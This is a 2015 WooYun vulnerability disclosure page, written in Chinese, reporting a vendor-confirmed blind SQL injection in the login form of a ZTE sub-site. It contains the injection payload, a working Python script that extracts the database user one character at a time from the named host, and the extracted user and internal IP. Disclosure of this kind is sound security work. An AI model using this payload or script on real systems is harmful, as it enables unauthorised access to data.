中兴某站存在SQL盲注<附验证脚本> | wooyun-2015-098954| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-098954

漏洞标题：中兴某站存在SQL盲注<附验证脚本>

漏洞作者：路人甲

提交时间：2015-03-02 17:57

修复时间：2015-04-16 17:58

公开时间：2015-04-16 17:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-02：细节已通知厂商并且等待厂商处理中
2015-03-03：厂商已经确认，细节仅向厂商公开
2015-03-13：细节向核心白帽子及相关领域专家公开
2015-03-23：细节向普通白帽子公开
2015-04-02：细节向实习白帽子公开
2015-04-16：细节向公众公开

简要描述：

详细说明：

http://zte.appstar.com.cn

中兴应用之星的分站，网站上面写着“欢迎您加盟中兴通讯”
SQL盲注，话说这几个字太小了，差点没看见。。。
注入点：

POST http://zte.appstar.com.cn/userlogin.action
loginName=-1' or  6=6 and length(user())=20 -- &loginPassword=g

#为真时页面右下角有几个小字提示“密码错误！”

##为假时页面右下角有几个小字提示“用户名不存在！”

特征太不明显，SQLMAP没有跑出来。。。
#user的长度为20：

验证猜解user()，得到：

acedb@192.168.18.102

python脚本:

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
post_data = {"loginPassword":'p'}
print 'Start to retrive MySQL User:\n'
user = ''
for i in range(1, 21):
    for payload in payloads:
        print '.',
        conn = httplib.HTTPConnection('zte.appstar.com.cn', timeout=60)
        s = "-1' or 6=6 and ascii(MID(user(),%d,1))=%s -- " %(i, ord(payload))
		
        post_data["loginName"] = s
		
		
        postdata = urllib.urlencode(post_data)
        conn.request('POST',
                     '/userlogin.action',
                     postdata,
                     headers)
        html_doc = conn.getresponse().read().decode('utf-8')
        conn.close()
        #print html_doc
        if html_doc.find(u'密码错误！') > 0:
            user += payload
            sys.stdout.write('\r[In Progress]' + user)
            sys.stdout.flush()
            break
print '\n[Done]MySQL user is %s' % user

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2015-03-03 08:44

厂商回复：

感谢~

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-098954

漏洞标题：中兴某站存在SQL盲注<附验证脚本>

相关厂商：中兴通讯股份有限公司

漏洞作者：路人甲

提交时间：2015-03-02 17:57

修复时间：2015-04-16 17:58

公开时间：2015-04-16 17:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-098954

漏洞标题：中兴某站存在SQL盲注<附验证脚本>

相关厂商：中兴通讯股份有限公司

漏洞作者： 路人甲

提交时间：2015-03-02 17:57

修复时间：2015-04-16 17:58

公开时间：2015-04-16 17:58

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-098954"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云